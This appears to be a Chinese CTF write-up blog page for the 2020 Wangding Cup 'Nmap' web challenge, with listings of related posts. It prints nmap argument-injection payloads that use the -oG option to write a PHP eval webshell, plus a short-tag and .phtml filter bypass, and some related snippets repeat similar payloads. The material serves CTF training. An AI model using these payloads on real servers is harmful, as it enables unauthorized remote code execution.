[网鼎杯 2020 朱雀组]Nmap(namp写webshell)

最新推荐文章于 2024-07-27 13:59:36 发布
最新推荐文章于 2024-07-27 13:59:36 发布
阅读量420 收藏
点赞数
分类专栏: Web刷题记录 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/111461538
版权

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

题目

在这里插入图片描述
这里用到nmap写webshell的技巧,如下代码

' <?php @eval($_POST["hack"]);?> -oG hack.php '

这样就能够将一句话写到目录下,再用菜刀或者蚁剑来连,但是这题过滤了php字样,所以标签用短标签,后缀用phtml来绕过

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
Nmap中文手册 - Nmap中文网.pdf
05-10
namp是最受欢迎的网络扫描器,本手册是根据namp官方网站整理来的,适合初学者
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3598
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 入文件、-iL读取扫描文件 解法:将nmap扫描结果入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
BUUCTF: [网鼎杯 2020 朱雀]Nmap
末初的CSDN博客
09-21 1985
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法入,尝试入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
[网鼎杯 2020 朱雀]Nmap1
m0_75178803的博客
04-01 977
打开题目在源代码中看到了提示先随便输入127.0.0.1那我们试试输入可以看到 | 被转义符号\所转义那我们输入 127.0.0.1 /| ls得到三条反斜线我们猜测,我们输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果我们输入的东西必须绕过这两个函数。
[网鼎杯 2020 朱雀]Nmap 1
plant1234的博客
04-15 2341
[网鼎杯 2020 朱雀]Nmap 1 首先得到题目打开得到 说是输入houst和IP进行扫描 测试一波:127.0.0.1 得到: 本地测一下nmap 命令得到: 发现效果一样 这里需要知道 nmap 命令将扫描结果保存在文件里面: 例如:将nmap 127.0.0.1的结果保存在test.txt里面 nmap 127.0.0.1 -oN test.txt nmap其他文件命令: -oN (标准输出) -oX (XML输出) -oS (ScRipT KIdd|3 oUTpuT) -oG (G
[网鼎杯 2020 朱雀]Nmap wp
qq_64201116的博客
08-24 808
2020朱雀杯]和的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马入。本篇文章细致讲解输入时和两个函数所进行的步骤。
[网鼎杯 2020 朱雀]Nmap
qq_43801002的博客
08-02 4498
题目 站老是崩,有点难受。 过程 1.题目非常熟悉,以前在buu过。主要考察nmap的一些用法。 2. 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 选项-oG 将结果Grep保存。 nmap -F -oG test.txt 192.168.23.1 选项-oA 该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中
BUUCTF Web [网鼎杯 2020 朱雀]Nmap1
网安小趴菜
11-16 670
BUUCTF Web [网鼎杯 2020 朱雀]Nmap wp1
[网鼎杯 2020 朱雀]Nmap(详细解读版)
最新发布
weixin_73399382的博客
07-27 778
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
web buuctf [网鼎杯 2020 朱雀]Nmap1
weixin_44214568的博客
04-05 1713
考点:namp注入 参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客 1. 2.利用NMAP里的-oG命令实现代码的入,那我们这里就可以尝试构造payload,来利用‘拼接,入我们想要的shell文件 我们直接用那道buu里的payload: ' <?php eval($_POST["cmd"]);?> -oG zhuque.php ' 注入之后发现存在过滤,fuzz,过滤了php (1)利用<?=来代替.
用mimiktz和nmap进行网络扫描
06-15
《mimiktz和nmap在网络扫描中的应用》 网络安全是一项至关重要的任务,尤其是在现代数字化社会中。本文将深入探讨如何使用mimiktz和nmap这两种强大的工具来进行网络扫描,以获取目标主机的登录账号信息,并通过不同...
网络扫描工具-nmap与zmap
12-28
本主题将深入探讨两种流行的网络扫描工具——nmap和zmap。 **nmap** nmap,全称为“Network Mapper”,是一款强大的开源网络探测和安全审计工具。它的主要功能包括: 1. **主机发现**:nmap通过发送特定的ICMP、...
nmap安装包,网络探针
08-22
nmap安装包,网络探针
【bugku】web30 (伪协议data://text/plain,)
EC_Carrot的博客
12-23 3386
<?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> 题目需要传入ac与fn内容一致,有2个解题方法在bugku里 解法一: ?ac=bugku&fn=
[GXYCTF2019]BabyUpload(典型图片马基础绕过流程)
EC_Carrot的博客
11-05 2157
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [GXYCTF2019]BabyUpload 这题坑了我一小会,我就在想这都能坑到我,真的是太年轻了(`-д-;)ゞ 试了一下gif,jpg用不了,png是可以的 上传php提示不能上传后缀名带ph的文件 再测试上传.htaccess文件 发现改type为image/jpeg能上传成功 到这里不难猜出是图片马getshell了 拿蚁剑连马拿fla
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1873
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
[安洵杯 2019]easy_web(MD5强碰撞绕过)
EC_Carrot的博客
11-06 1589
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [安洵杯 2019]easy_web 点进去就看到这个url,cmd传入ls、dir没什么用 img这边把他删了,图片就没了 那这里应该可以利用来读文件了,但是他加密过了,看起来像base64,解下密 看起来也像base64,再来一次 这次就解出个像hex编码的字符串了,解密后得出文件名 555.png 那我们知道这的确是文件名经过加密后传入
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值